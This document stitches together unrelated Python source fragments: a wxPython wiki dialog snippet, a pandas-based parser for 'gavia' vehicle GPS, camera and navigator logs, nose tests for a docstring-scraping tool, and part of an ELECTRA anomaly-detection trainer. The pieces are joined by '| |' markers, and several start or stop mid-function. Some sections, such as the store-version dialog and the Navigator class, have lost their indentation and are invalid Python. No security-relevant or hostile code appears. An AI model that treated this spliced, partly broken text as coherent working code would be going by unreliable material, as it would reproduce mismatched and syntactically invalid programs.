    AdditionalDialogs.RenameWikiWordDialog.runModal(self, wikiWord, self, -1)
    return
    # dlg = wx.TextEntryDialog(self, uniToGui(_(u"Rename '%s' to:") %
    #         wikiWord), _(u"Rename Wiki Word"), wikiWord, wx.OK | wx.CANCEL)
    #
    # try:
    #     while dlg.ShowModal() == wx.ID_OK and \
    #             not self.showWikiWordRenameConfirmDialog(wikiWord,
    #                     guiToUni(dlg.GetValue())):
    #         pass
    #
    # finally:
    #     dlg.Destroy()
# TODO Unicode
def showStoreVersionDialog(self):
dlg = wx.TextEntryDialog (self, _(u"Description:"),
_(u"Store new version"), u"",
wx.OK | wx.CANCEL)
description = None
if dlg.ShowModal() == wx.ID_OK:
description = dlg.GetValue()
dlg.Destroy()
if not description is None:
self.saveAllDocPages()
| |
import os
import pandas as pd
import gavia.time as gavtime
from gavia.version import __version__
import sys
def getlogs(dir, logtype):
    '''
    Return the sorted list of filenames in *dir* whose name contains
    *logtype*. For logtype 'gps', 'gpsfix' logs are excluded.

    Note: the parameter name `dir` shadows the builtin but is kept for
    API compatibility.
    '''
    files = [name for name in os.listdir(dir) if logtype in name]
    if logtype == 'gps':
        # 'gpsfix' filenames also contain the substring 'gps'; drop them.
        files = [name for name in files if 'gpsfix' not in name]
    return sorted(files)
def parsedatetime(dateNtime):
    '''
    Parse a fixed-width timestamp string such as '2019 04 16 10:59:20.619'
    into a (year, month, day, hour, minute, second, millisecond) int tuple.
    '''
    # Fixed character positions are used instead of split() because the
    # field separators are not perfectly consistent across logs.
    slices = ((0, 4), (5, 7), (8, 10), (11, 13), (14, 16), (17, 19), (20, 23))
    return tuple(int(dateNtime[a:b]) for a, b in slices)
def matchmerge(df1, df1time, df2, df2time, df1cols=[None], df2cols=[None], df3=None, df3cols=[None], df3time=None):
    '''
    Match multiple log files by specified time header such as epoch time.
    If an exact match does not exist, use the closest sample entry.

    Parameters
    ----------
    df1 : DataFrame
        DataFrame to add to from other DataFrames
    df1time : string
        Column header in df1 used to match time of sample
    df2 : DataFrame
        DataFrame with entries to add to df1 according to closest matching time entry
    df2time : string
        Column header in df2 used to match time of sample
    df1cols, df2cols, df3cols : list of strings
        Column headers to keep from the corresponding DataFrame; the
        default [None] keeps all columns. Software metadata columns are
        always regenerated, so they are stripped from these lists.
    df3 : DataFrame, optional
        Optional third DataFrame to merge; requires df3time.
    df3time : string, optional
        Column header in df3 used to match time of sample

    Returns
    -------
    New DataFrame combining df1 rows with the closest-in-time rows of df2
    (and df3 when given), plus regenerated software metadata columns.

    Raises
    ------
    ValueError
        If df3 is given without df3time.
    '''
    meta = ('software_name', 'software_version', 'software_url')

    def _keep(cols, df):
        # Resolve the [None] default to "all columns of df" and drop the
        # metadata columns, without mutating the caller's list.
        if None in cols:
            cols = list(df)
        return [c for c in cols if c not in meta]

    def _extend_unique(base, extra):
        # Append items of *extra* not already in *base*; return the kept
        # items (the columns to copy from that DataFrame).
        kept = []
        for c in extra:
            if c not in base:
                base.append(c)
                kept.append(c)
        return kept

    if df3 is not None and df3time is None:
        raise ValueError('Need to specify df3time when using df3 parameter')

    # BUGFIX: the previous implementation deleted metadata columns while
    # iterating over range(len(...)) (IndexError when a metadata column is
    # not last, and skipped entries after a deletion) and mutated the
    # caller's df2cols/df3cols lists in place. Both are fixed here.
    df1cols = _keep(df1cols, df1)
    dfmcols = list(df1cols)
    df2cols = _extend_unique(dfmcols, _keep(df2cols, df2))
    if df3 is not None:
        df3cols = _extend_unique(dfmcols, _keep(df3cols, df3))
    dfmcols.extend(meta)

    dfm = pd.DataFrame(columns=dfmcols)
    for i in range(len(df1)):
        t1 = df1.loc[i][df1time]
        if pd.isna(t1):
            continue  # skip rows with no timestamp
        row = [df1.loc[i][h] for h in df1cols]
        # Closest df2 row by absolute time difference (stable sort keeps
        # the first occurrence on ties).
        df2idx = abs(df2[df2time] - t1).sort_values().index[0]
        row.extend(df2.loc[df2idx][h] for h in df2cols)
        if df3 is not None:
            df3idx = abs(df3[df3time] - t1).sort_values().index[0]
            row.extend(df3.loc[df3idx][h] for h in df3cols)
        # Regenerated software provenance columns.
        row.extend(['gavia', __version__, 'github.com/brett-hosking/gavia'])
        dfm.loc[len(dfm)] = row
    return dfm
def timeshift(df,shift):
    '''
    Introduce a time shift (in seconds) in log file and recalculate
    human-readable times.

    Note: the 'timestamp' (and 'capture-time', if present) columns of the
    input *df* are shifted IN PLACE as a side effect; only the derived
    human-readable fields are written to the returned copy.

    Parameters
    ----------
    df : DataFrame
        gavia log with timestamp header and values given in seconds
    shift : float
        time shift in seconds

    Returns
    -------
    New log as a DataFrame with adjusted time fields
    '''
    headers = list(df)
    if 'timestamp' not in headers:
        raise ValueError('not a valid gavia logfile; the log should contain a timestamp header')
    # Shift the second-resolution time columns (mutates the caller's frame)
    df['timestamp'] = df['timestamp'] + shift
    has_capture = 'capture-time' in headers
    if has_capture:
        df['capture-time'] = df['capture-time'] + shift
    # Hoist the column-position lookups out of the row loop (loop-invariant).
    # These raise ValueError if the log lacks an expected derived column.
    ts_epoch_i = headers.index('timestamp_epoch')
    ts_nano_i = headers.index('timestamp_nano')
    time_i = headers.index('time')
    ymd_i = [headers.index(h) for h in ('year', 'month', 'day', 'hour',
                                        'minute', 'second', 'millisecond')]
    if has_capture:
        cap_epoch_i = headers.index('capture_epoch')
        cap_micro_i = headers.index('capture_micro')
        cap_field_i = [headers.index(h) for h in
                       ('capture_year', 'capture_month', 'capture_day',
                        'capture_hour', 'capture_minute', 'capture_second')]
    # New DataFrame with the recalculated human-readable times
    dfc = pd.DataFrame(columns=headers)
    for i in range(len(df)):
        # NOTE(review): mixes .loc and .iloc -- assumes a default
        # RangeIndex on df; confirm against callers.
        row = df.loc[i].values.tolist()
        if not pd.isna(df.loc[i]['timestamp']):
            # assumes str() of the timestamp always contains a '.' -- TODO confirm
            row[ts_epoch_i], row[ts_nano_i] = str(df.iloc[i]['timestamp']).split('.')
            row[time_i] = gavtime.epoch2dtimeformat(df.iloc[i]['timestamp'])
            for col, val in zip(ymd_i, parsedatetime(row[time_i])):
                row[col] = val
            if has_capture and not pd.isna(df.loc[i]['capture-time']):
                row[cap_epoch_i], row[cap_micro_i] = str(df.iloc[i]['capture-time']).split('.')
                capture_dtime = gavtime.epoch2datetime(row[cap_epoch_i])
                for col, val in zip(cap_field_i, capture_dtime):
                    row[col] = val
        # Add row to new DataFrame
        dfc.loc[i] = row
    return dfc
class GPS:
    """Accumulates gavia GPS log rows into a pandas DataFrame.

    The column set and order are fixed by headers(); rows are appended one
    at a time via addrow() and written out with save().
    """
    def __init__(self):
        # Empty frame with the full GPS column set, in header order.
        self.df = pd.DataFrame(columns=self.headers())
    def save(self,path):
        """Write the accumulated rows to *path* as CSV (pandas to_csv defaults)."""
        self.df.to_csv(path)
    def init_dict(self):
        """Return a field -> None template dict.

        NOTE(review): the keys here use the raw hyphenated log field names
        (e.g. 'diff-age') and omit the derived time/software columns, so
        they do NOT match headers() -- presumably a parse-time scratch
        dict; confirm against callers.
        """
        return { 'timestamp': None,
                 'time': None,
                 'UTC': None,
                 'cogt':None,
                 'diff-age': None,
                 'hdop': None,
                 'lat': None,
                 'lat-dev': None,
                 'lon':None,
                 'lon-dev':None,
                 'messages-received':None,
                 'quality': None,
                 'raw-logged-bytes': None,
                 'received-telnet-bytes':None,
                 'sats':None,
                 'sent-corr-bytes':None,
                 'sent-corr-packets':None,
                 'sent-telnet-bytes':None,
                 'sogk':None,
                 'sogm':None,
                 'stnRef':None,
                 'time-since-sent':None
                 }
    def addrow( self,
                timestamp=None,
                timestamp_epoch=None,
                timestamp_nano=None,
                time=None,
                year=None,
                month=None,
                day=None,
                hour=None,
                minute=None,
                second=None,
                millisecond=None,
                UTC=None,
                cogt=None,
                diff_age=None,
                hdop=None,
                lat=None,
                lat_dev=None,
                lon=None,
                lon_dev=None,
                messages_received=None,
                quality=None,
                raw_logged_bytes=None,
                received_telnet_bytes=None,
                sats=None,
                sent_corr_bytes=None,
                sent_corr_packets=None,
                sent_telnet_bytes=None,
                sogk=None,
                sogm=None,
                stnRef=None,
                time_since_sent=None,
                software_name='gavia',
                software_version=__version__,
                software_url='github.com/brett-hosking/gavia'
                ):
        """Append one row to the DataFrame.

        The positional order of the list below must match headers()
        exactly; all fields default to None except the software
        provenance columns.
        """
        self.df.loc[len(self.df)] = [
                                    timestamp,
                                    timestamp_epoch,
                                    timestamp_nano,
                                    time,
                                    year,
                                    month,
                                    day,
                                    hour,
                                    minute,
                                    second,
                                    millisecond,
                                    UTC,
                                    cogt,
                                    diff_age,
                                    hdop,
                                    lat,
                                    lat_dev,
                                    lon,
                                    lon_dev,
                                    messages_received,
                                    quality,
                                    raw_logged_bytes,
                                    received_telnet_bytes,
                                    sats,
                                    sent_corr_bytes,
                                    sent_corr_packets,
                                    sent_telnet_bytes,
                                    sogk,
                                    sogm,
                                    stnRef,
                                    time_since_sent,
                                    software_name,
                                    software_version,
                                    software_url
                                    ]
    def headers(self):
        """Column names, in the fixed order addrow() appends them."""
        return [
                'timestamp',
                'timestamp_epoch',
                'timestamp_nano',
                'time',
                'year',
                'month',
                'day',
                'hour',
                'minute',
                'second',
                'millisecond',
                'UTC',
                'cogt',
                'diff_age',
                'hdop',
                'lat',
                'lat_dev',
                'lon',
                'lon_dev',
                'messages_received',
                'quality',
                'raw_logged_bytes',
                'received_telnet_bytes',
                'sats',
                'sent_corr_bytes',
                'sent_corr_packets',
                'sent_telnet_bytes',
                'sogk',
                'sogm',
                'stnRef',
                'time_since_sent',
                'software_name',
                'software_version',
                'software_url'
                ]
class Camera:
    """Accumulates gavia camera log rows into a pandas DataFrame.

    The column set and order are fixed by headers(); rows are appended one
    at a time via addrow() and written out with save().
    """
    def __init__(self):
        # Empty frame with the full camera column set, in header order.
        self.df = pd.DataFrame(columns=self.headers())
    def save(self,path):
        """Write the accumulated rows to *path* as CSV (pandas to_csv defaults)."""
        self.df.to_csv(path)
    def init_dict(self):
        """Return a field -> None template dict (software fields pre-filled).

        NOTE(review): omits the derived time columns (timestamp_epoch,
        capture_* etc.) and filepath/filename, so it is a subset of
        headers() -- presumably a parse-time scratch dict; confirm
        against callers.
        """
        return { 'timestamp': None,
                 'time': None,
                 'capture-time': None,
                 'clock-drift': None,
                 'delivered-frame-rate': None,
                 'frame-drop-count': None,
                 'frame-loss-percentage': None,
                 'frames-captured':None,
                 'frames-written': None,
                 'pc-time':None,
                 'process-in-Q':None,
                 'process-out-Q':None,
                 'process-pop-q-size':None,
                 'build-number':None,
                 'build-tag':None,
                 'strobe-pin':None,
                 'mode':None,
                 'framerate':None,
                 'bayer_filter':None,
                 'port':None,
                 'host_interface':None,
                 'shutter_auto':None,
                 'shutter_max':None,
                 'shutter_min':None,
                 'shutter':None,
                 'gain_auto':None,
                 'gain_max':None,
                 'gain_min':None,
                 'gain':None,
                 'exposure':None,
                 'whitebalance_auto':None,
                 'whitebalance_bu':None,
                 'whitebalance_rv':None,
                 'path':None,
                 'save_raw':None,
                 'jpeg_quality':None,
                 'manipthreads':None,
                 'img_q_size':None,
                 'frame_drop_interval':None,
                 'exposure_test':None,
                 'abort_data_timeout':None,
                 'software_name':'gavia',
                 'software_version':__version__,
                 'software_url':'github.com/brett-hosking/gavia'}
    def addrow( self,
                timestamp=None,
                timestamp_epoch=None,
                timestamp_nano=None,
                time=None,
                year=None,
                month=None,
                day=None,
                hour=None,
                minute=None,
                second=None,
                millisecond=None,
                filepath=None,
                filename=None,
                capture_time=None,
                capture_epoch=None,
                capture_year=None,
                capture_month=None,
                capture_day=None,
                capture_hour=None,
                capture_minute=None,
                capture_second=None,
                capture_micro=None,
                clock_drift=None,
                delivered_frame_rate=None,
                frame_drop_count=None,
                frame_loss_percentage=None,
                frames_captured=None,
                frames_written=None,
                pc_time=None,
                process_in_Q=None,
                process_out_Q=None,
                process_pop_q_size=None,
                build_number=None,
                build_tag=None,
                strobe_pin=None,
                mode=None,
                framerate=None,
                bayer_filter=None,
                port=None,
                host_interface=None,
                shutter_auto=None,
                shutter_max=None,
                shutter_min=None,
                shutter=None,
                gain_auto=None,
                gain_max=None,
                gain_min=None,
                gain=None,
                exposure=None,
                whitebalance_auto=None,
                whitebalance_bu=None,
                whitebalance_rv=None,
                path=None,
                save_raw=None,
                jpeg_quality=None,
                manipthreads=None,
                img_q_size=None,
                frame_drop_interval=None,
                exposure_test=None,
                abort_data_timeout=None,
                software_name='gavia',
                software_version=__version__,
                software_url='github.com/brett-hosking/gavia'
                ):
        """Append one row to the DataFrame.

        The positional order of the list below must match headers()
        exactly; all fields default to None except the software
        provenance columns.
        """
        self.df.loc[len(self.df)] = [
                                    timestamp,
                                    timestamp_epoch,
                                    timestamp_nano,
                                    time,
                                    year,
                                    month,
                                    day,
                                    hour,
                                    minute,
                                    second,
                                    millisecond,
                                    filepath,
                                    filename,
                                    capture_time,
                                    capture_epoch,
                                    capture_year,
                                    capture_month,
                                    capture_day,
                                    capture_hour,
                                    capture_minute,
                                    capture_second,
                                    capture_micro,
                                    clock_drift,
                                    delivered_frame_rate,
                                    frame_drop_count,
                                    frame_loss_percentage,
                                    frames_captured,
                                    frames_written,
                                    pc_time,
                                    process_in_Q,
                                    process_out_Q,
                                    process_pop_q_size,
                                    build_number,
                                    build_tag,
                                    strobe_pin,
                                    mode,
                                    framerate,
                                    bayer_filter,
                                    port,
                                    host_interface,
                                    shutter_auto,
                                    shutter_max,
                                    shutter_min,
                                    shutter,
                                    gain_auto,
                                    gain_max,
                                    gain_min,
                                    gain,
                                    exposure,
                                    whitebalance_auto,
                                    whitebalance_bu,
                                    whitebalance_rv,
                                    path,
                                    save_raw,
                                    jpeg_quality,
                                    manipthreads,
                                    img_q_size,
                                    frame_drop_interval,
                                    exposure_test,
                                    abort_data_timeout,
                                    software_name,
                                    software_version,
                                    software_url
                                    ]
    def headers(self):
        """Column names, in the fixed order addrow() appends them.

        NOTE(review): mixes hyphenated raw-log names ('capture-time',
        'clock-drift', ...) with underscored derived names -- this matches
        the raw log format, not a typo; confirm before normalizing.
        """
        return [
                'timestamp',
                'timestamp_epoch',
                'timestamp_nano',
                'time',
                'year',
                'month',
                'day',
                'hour',
                'minute',
                'second',
                'millisecond',
                'filepath',
                'filename',
                'capture-time',
                'capture_epoch',
                'capture_year',
                'capture_month',
                'capture_day',
                'capture_hour',
                'capture_minute',
                'capture_second',
                'capture_micro',
                'clock-drift',
                'delivered-frame-rate',
                'frame-drop-count',
                'frame-loss-percentage',
                'frames-captured',
                'frames-written',
                'pc-time',
                'process-in-Q',
                'process-out-Q',
                'process-pop-q-size',
                'build-number',
                'build-tag',
                'strobe-pin',
                'mode',
                'framerate',
                'bayer_filter',
                'port',
                'host_interface',
                'shutter_auto',
                'shutter_max',
                'shutter_min',
                'shutter',
                'gain_auto',
                'gain_max',
                'gain_min',
                'gain',
                'exposure',
                'whitebalance_auto',
                'whitebalance_bu',
                'whitebalance_rv',
                'path',
                'save_raw',
                'jpeg_quality',
                'manipthreads',
                'img_q_size',
                'frame_drop_interval',
                'exposure_test',
                'abort_data_timeout',
                'software_name',
                'software_version',
                'software_url']
class Navigator:
def __init__(self):
self.df = pd.DataFrame(columns=self.headers())
def save(self,path):
self.df.to_csv(path)
def init_deadreckoning_dict(self):
'''
dead-reckoning-orientation
dead-reckoning-velocity
dead-reckoning-position
dead-reckoning-variance
'''
return { 'heading':None,
'pitch':None,
'roll':None,
'heave':None,
'surge':None,
'sway':None,
'lat':None,
'lon':None,
'var_lat':None,
'var_lat_lon':None,
'var_lon':None
}
def init_orientation_dict(self):
'''
orientation
'''
return { 'heading':None,
'pitch':None,
'roll':None
}
def init_variance_dict(self):
'''
Variance
'''
return { 'var_lat':None,
'var_lat_lon':None,
'var_lon':None
}
def init_position_dict(self):
'''
Position
'''
return { 'depth':None,
'lat':None,
'lon':None
}
def init_velocity_dict(self):
'''
Velocity
'''
return { 'heave':None,
'surge':None,
'sway':None
}
def init_dict(self):
return { 'timestamp': None,
'time': None,
'build-number':None,
'build-tag':None,
'calculate-magnetic-deviation':None,
'magnetic-deviation':None,
'pressure-timeout':None,
'compass-timeout':None,
'dead-reckoning-sog-timeout':None,
'dvl-timeout':None,
'gps-timeout':None,
'gps-validation-enabled':None,
'veto-use-water-velocity':None,
'station-keeping-enabled':None,
'sound-velocity-timeout':None,
'temperature-timeout':None,
'seanav-timeout':None,
'use-pressure':None,
'max-allowed-variance':None,
'variance-exceeded-warning-level':None,
'lat-lon-precision':None,
'max-dead-reckoning-distance':None,
'dead-reckoning-distance':None,
'pressure-depth-conversion':None,
'average-water-density':None,
'use-water-velocity':None,
'sound-velocity':None,
'temperature':None,
'density-abort-limit':None,
'gps-variance':None,
'lbl-variance':None,
'revolutions-bias':None,
'revolutions-scale':None,
'dvl-bias':None,
'dvl-scale':None,
'gyro-bias':None,
'control-rate':None,
'motor-default':None,
'stationary-radius':None,
'stationary-p':None,
'stationary-idle':None,
'stationary-depth-timeout':None,
'estimate-speed':None,
'observe-timer-on':None,
'predict-timer-on':None,
'binary-log':None,
'broadcast-interface':None,
'broadcast-enable':None,
'broadcast-frequency':None,
'broadcast-navigation-message':None,
'broadcast-depth-message':None,
'broadcast-sound-velocity-message':None,
'idle-status':None,
'maxWarningLevel':None,
'pilot-status':None,
| |
# ######################################################################
# Copyright (c) 2014, Brookhaven Science Associates, Brookhaven #
# National Laboratory. All rights reserved. #
# #
# Redistribution and use in source and binary forms, with or without #
# modification, are permitted provided that the following conditions #
# are met: #
# #
# * Redistributions of source code must retain the above copyright #
# notice, this list of conditions and the following disclaimer. #
# #
# * Redistributions in binary form must reproduce the above copyright #
# notice this list of conditions and the following disclaimer in #
# the documentation and/or other materials provided with the #
# distribution. #
# #
# * Neither the name of the Brookhaven Science Associates, Brookhaven #
# National Laboratory nor the names of its contributors may be used #
# to endorse or promote products derived from this software without #
# specific prior written permission. #
# #
# THIS SOFTWARE IS PROVIDED BY THE COPYRIGHT HOLDERS AND CONTRIBUTORS #
# "AS IS" AND ANY EXPRESS OR IMPLIED WARRANTIES, INCLUDING, BUT NOT #
# LIMITED TO, THE IMPLIED WARRANTIES OF MERCHANTABILITY AND FITNESS #
# FOR A PARTICULAR PURPOSE ARE DISCLAIMED. IN NO EVENT SHALL THE #
# COPYRIGHT HOLDER OR CONTRIBUTORS BE LIABLE FOR ANY DIRECT, #
# INDIRECT, INCIDENTAL, SPECIAL, EXEMPLARY, OR CONSEQUENTIAL DAMAGES #
# (INCLUDING, BUT NOT LIMITED TO, PROCUREMENT OF SUBSTITUTE GOODS OR #
# SERVICES; LOSS OF USE, DATA, OR PROFITS; OR BUSINESS INTERRUPTION) #
# HOWEVER CAUSED AND ON ANY THEORY OF LIABILITY, WHETHER IN CONTRACT, #
# STRICT LIABILITY, OR TORT (INCLUDING NEGLIGENCE OTHERWISE) ARISING #
# IN ANY WAY OUT OF THE USE OF THIS SOFTWARE, EVEN IF ADVISED OF THE #
# POSSIBILITY OF SUCH DAMAGE. #
########################################################################
from __future__ import (absolute_import, division, print_function,
unicode_literals)
from itertools import product
import six
import logging
logger = logging.getLogger(__name__)
from vttools import scrape
from numpy.testing import assert_string_equal, assert_equal, assert_raises
from nose.tools import assert_true
from scrape_test_source import eat_porridge, porridge_for_the_bears, has_defaults
def test_scrape():
    """Scraping a known function must expose every expected metadata key."""
    expected_keys = ('input_ports', 'output_ports', 'doc_string',
                     'f_type', 'func_name', 'module_path')
    res = scrape.scrape_function('porridge_for_the_bears', __name__)
    for key in expected_keys:
        assert_true(key in res)
def test_enum():
    """The enum values scraped from has_defaults must match its declared enum."""
    scraped = scrape.scrape_function('has_defaults', __name__)
    last_port = scraped['input_ports'][-1]
    assert_equal(last_port['values'], has_defaults.e)
def test_obj_src():
    """obj_src must return the function source, beginning with its def line."""
    source_text = scrape.obj_src(eat_porridge)
    first_line = str(source_text.split('\n')[0])
    expected_first_line = str(
        'def eat_porridge(this_sucks, temperature, wtf):')
    assert_string_equal(first_line, expected_first_line)
def _optional_test_helper(tst, tar):
    # One yielded check: the optional flag parsed from the type string.
    optional_flag = scrape._type_optional(tst)[1]
    assert_equal(optional_flag, tar)
def test_type_optional():
    """'optional' markers in type strings are detected in either spelling."""
    cases = (('array, optional', True),
             ('array', False),
             ('array (optional)', True))
    for type_string, expected in cases:
        yield _optional_test_helper, type_string, expected
def test_stacked_output_port():
    """porridge_for_the_bears is documented with exactly three output ports."""
    scraped = scrape.scrape_function('porridge_for_the_bears', __name__)
    output_ports = scraped['output_ports']
    assert_equal(len(output_ports), 3)
def test_enum_type():
    """Exercise _enum_type on a range of docstring type strings.

    Curly-brace sets of names count as enums; a plain type name does not;
    brace sets of non-name literals (numbers) raise ValueError; and
    shape-style brace groups such as '{ (..., M, M), (..., M, K) } array'
    (as seen in e.g. the numpy.linalg.svd docstring) are still treated as
    enum-like.
    """
    enum_str = '{True, False, Maybe}'
    plain_str = 'array'
    bad_mixed = '{true, FALSE, 452}'
    bad_floats = '{12.5, 5.3}'
    shape_strs = ('{ (..., M, M), (..., M, K) } array',
                  '{ (..., N, N), (..., K, N) } array')
    assert_equal(scrape._enum_type(enum_str)[1], True)
    assert_equal(scrape._enum_type(enum_str)[2],
                 ['True', 'False', 'Maybe'])
    assert_equal(scrape._enum_type(plain_str)[1], False)
    assert_raises(ValueError, scrape._enum_type, bad_mixed)
    assert_raises(ValueError, scrape._enum_type, bad_floats)
    for shape_str in shape_strs:
        assert_equal(scrape._enum_type(shape_str)[1], True)
# Representative docstring type strings, grouped by the normalized type each
# one should map to (the groups mirror the keys of scrape.sig_map and feed
# the normalization tests below).
object_type_strings = ('any', 'object')
array_type_strings = (
    'array', 'array-like', 'array_like', 'array like',
    'Array', 'ndarray', 'ndarray-like', '(N, ) array',
    '(N, Maoeu, 8) array', '(,) array', '(, ) array',
    'np.array', 'np.ndarray', '(N, M, P) array',
    '(..., K) array',
    '(..., M, N) array_like', '(N, M, P) ndarray',
    '(M,) array_like', '(M) array_like', 'MxN array',
    'array_like, shape (M, N)', 'ndarray, float', 'ndarrays',
    '2D array', '2-D array',
    'array_like (1-D)', 'array_like (1D or 2D)',
    'array_like (cast to booleans)',
    'int or [int, int] or array-like or [array, array]',
    'array_likes',
)
matrix_type_strings = (tuple('{}matrix'.format(prefix)
                             for prefix in ('np.', 'numpy.', '')) +
                       ('(N, M) matrix', ))
list_type_strings = ('list', 'List', 'list-like', 'list_like',
                     'list like', 'listlike')
# a one-element tuple (explicit trailing comma)
tuple_type_strings = ('tuple',)
seq_type_strings = ('sequence', '1D sequence', '1-D sequence')
dtype_type_strings = ('dtype', 'dtype like', 'np.dtype', 'numpy.dtype',
                      'data-type', 'data type', 'data type code',
                      'dtype specifier',
                      'numpy dtype')
bool_type_strings = ('bool', 'boolean')
file_type_strings = ('file', 'filename', 'file handle',
                     'file object', 'file handle object')
scalar_type_strings = ('scalar', 'number')
float_type_strings = tuple(
    '{}float{}'.format(prefix, bits)
    for prefix, bits in product(('np.', 'numpy.', ''), (16, 32, 64, 128))
) + ('double', 'single', 'float', 'float (only if)')
# known fails: 'int (cast to 0 or 1)'
int_type_strings = ('integer', 'InTeGeR') + tuple(
    '{}{}int{}'.format(prefix, unsigned, bits)
    for prefix, unsigned, bits in product(('np.', 'numpy.', ''),
                                          ('u', ''),
                                          (8, 16, 32, 64))
)
complex_type_strings = ('complex', )
dict_type_strings = ('dict', 'dictionary')
str_type_strings = ('str', 'string', 'str-like')
callable_type_strings = ('function', 'func', 'callable',
                         'callable f(x,*args)', 'function(x) -> f')
def test_normalize_simple():
    """Yield one normalization check per sample type string.

    First verifies that the sample groups cover exactly the keys of
    scrape.sig_map, so a newly added signature type cannot go untested.
    The sample strings are modelled on real docstrings such as
    numpy.outer ('(M,) array_like', '(M, N) ndarray') and
    numpy.linalg.svd ('bool, optional', '{ (..., M, M), (..., M, K) } array').
    """
    samples_by_type = {
        'object': object_type_strings,
        'array': array_type_strings,
        'matrix': matrix_type_strings,
        'list': list_type_strings,
        'tuple': tuple_type_strings,
        'seq': seq_type_strings,
        'dtype': dtype_type_strings,
        'bool': bool_type_strings,
        'file': file_type_strings,
        'scalar': scalar_type_strings,
        'float': float_type_strings,
        'int': int_type_strings,
        'complex': complex_type_strings,
        'dict': dict_type_strings,
        'str': str_type_strings,
        'callable': callable_type_strings,
    }
    # make sure we test everything!
    assert_equal(set(six.iterkeys(samples_by_type)),
                 set(six.iterkeys(scrape.sig_map)))
    for target, samples in six.iteritems(samples_by_type):
        for type_string in samples:
            yield _normalize_test_helper, type_string, target
def _normalize_test_helper(tst, targ):
    # One yielded check: the raw type string normalizes to the expected key.
    normalized = scrape._normalize_type(tst)
    assert_equal(normalized, targ)
def test_check_alt_types():
    """Compound/alternative type phrases normalize to their dominant type
    (or to None when nothing in the phrase is recognized)."""
    cases = (
        ('float or int', 'float'),
        ('scalar or tuple of scalars', 'tuple'),
        ('int or scalar', 'scalar'),
        ('scalar or sequence of scalars', 'seq'),
        ('MxN ndarray', 'array'),
        ('integer value', 'int'),
        ('aardvark', None),
        ('aardvark of doom', None),
        ('list or aardavrk', 'list'),
        ('aardvark or integer', 'int'),
    )
    for type_string, expected in cases:
        yield _normalize_test_helper, type_string, expected,
def test_truncate_description():
    """_truncate_description passes short text through and crops long text."""
    short_description = ['length of three']
    long_description = ['This object is the original description '
                        'stripped from the doc string. The object is ',
                        'actually a list of strings.']
    word_count = 6
    # A description at/below the word count passes through unchanged.
    assert_equal(scrape._truncate_description(short_description, word_count),
                 'length of three')
    # A longer description is cropped to the first word_count words.
    assert_equal(scrape._truncate_description(long_description, word_count),
                 'This object is the original description')
def _func_helper(func, test_string, expected_string):
    # Generic yielded check: func(test_string) must equal expected_string.
    actual = func(test_string)
    assert_equal(actual, expected_string)
def test_guess_type():
"""
The function _guess_type() is used in the function _enum_type(). The
initial input is the stripped type string.
e.g. {14, 0.333, 5j, True, False, Maybe}
The input string is then checked to make sure that there are enclosing
curly braces, after which the enum string is separated out using the
commas, any string declarations are then removed (i.e. ' or "), and each
element of the original | |
self.args.output_dir
self._move_model_to_device()
if "train_document" in self.extra_args and self.extra_args["train_document"] == True:
train_dataset = DocumentDataset(
self.tokenizer,
self.args,
train_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
eval_dataset = DocumentDataset(
self.tokenizer,
self.args,
eval_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
logger.info(" Using train_document")
else:
train_dataset = SimpleDataset(
self.tokenizer,
self.args,
train_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
eval_dataset = SimpleDataset(
self.tokenizer,
self.args,
eval_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
eval_doc_dataset = DocumentDataset(
self.tokenizer,
self.args,
eval_file,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
eval_doc_dataset_outliers = DocumentDataset(
self.tokenizer,
self.args,
eval_file_outlier,
self.args.block_size,
2,
sliding_window=self.args.sliding_window)
self.build_text_samples(eval_file, eval_file_outlier)
global_step, tr_loss = self.train_anomaly(
train_dataset,
eval_dataset,
eval_doc_dataset,
eval_doc_dataset_outliers,
show_running_loss=show_running_loss,
verbose=verbose,
**kwargs,
)
self._save_model(output_dir, model=self.model)
if self.args.model_type == "electra":
self.save_discriminator()
self.save_generator()
if verbose:
logger.info(" Training of {} model complete. Saved to {}.".format(
self.args.model_type, output_dir))
def extract_representations(self,
dataloader,
step,
path='./representations/',
name='train',
dump=True):
with torch.no_grad():
total = 0
representations = []
model = self.model.discriminator_model
model.eval()
batches = merge_batches(dataloader, f'repr_extract_{name}_rand')
for batch, idx_list in batches:
if batch is None:
continue
batch = batch.to(self.device).long()
output = model(batch)
reprs = output[-1].cpu().numpy()
reprs = np.split(reprs, idx_list)
reprs = np.array([np.mean(t, axis=0) for t in reprs])
representations.append(reprs)
del batches
representations = np.concatenate(representations, axis=0)
dump_name = self.extra_args['tensorboard_dir'][10:]
if dump:
with open(f'{path}{name}{dump_name}_{step}.pkl',
'wb') as f_out:
pkl.dump(representations, f_out)
del representations
def test_anomaly(self, batch):
args = self.args
tokenizer = self.tokenizer
if not ("vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False):
masks = self.masks
masks_len = len(masks)
unsorted_outs = []
else:
masks_len = self.extra_args['vanilla_electra']['no_masks']
rmd_classes = masks_len #hardcoded, should be changed for RMD anomaly detection
masks_len = 1
unsorted_outs_rtd = []
repr_list = []
preds = []
batch_size = batch.shape[0]
unsorted_outs_rtd_electra = []
binary_labels = []
pad_labels = []
model = self.model
model.eval()
input_tokens = []
if 'replace_tokens' in self.extra_args:
replace_tokens = self.extra_args['replace_tokens']
else:
replace_tokens = True
with torch.no_grad():
if not ("vanilla_electra" in self.extra_args and self.extra_args["vanilla_electra"] != False):
# to do: just viable masks
for mask_idx, mask_ in enumerate(masks):
mask_['mask'] = [False for _ in mask_['mask']]
inputs, labels, _ = mask_tokens(batch, tokenizer, masks, args, custom_mask=mask_, train=False, no_mask=True)
is_pad = [[1 if el == tokenizer.convert_tokens_to_ids(tokenizer.pad_token) else 0 for el in input_] for input_ in inputs]
is_pad = np.array(is_pad)
pad_labels.append(np.expand_dims(is_pad, axis=1))
labels_bin = [[0 if el == -100 else 1 for el in mask]
for mask in labels]
labels_bin = np.array(labels_bin)
binary_labels.append(np.expand_dims(labels_bin, axis=1))
inputs = inputs.to(self.device)
labels = labels.to(self.device)
output = model(inputs, masked_lm_labels=labels, replace_tokens=replace_tokens) if args.mlm else model(inputs, labels=labels)
d_output, d_inputs, rtd_output = output[2], output[3].cpu(), output[8]
representations = output[7].cpu()
out_softmax = F.softmax(d_output).cpu().numpy()
unsorted_outs.append(out_softmax)
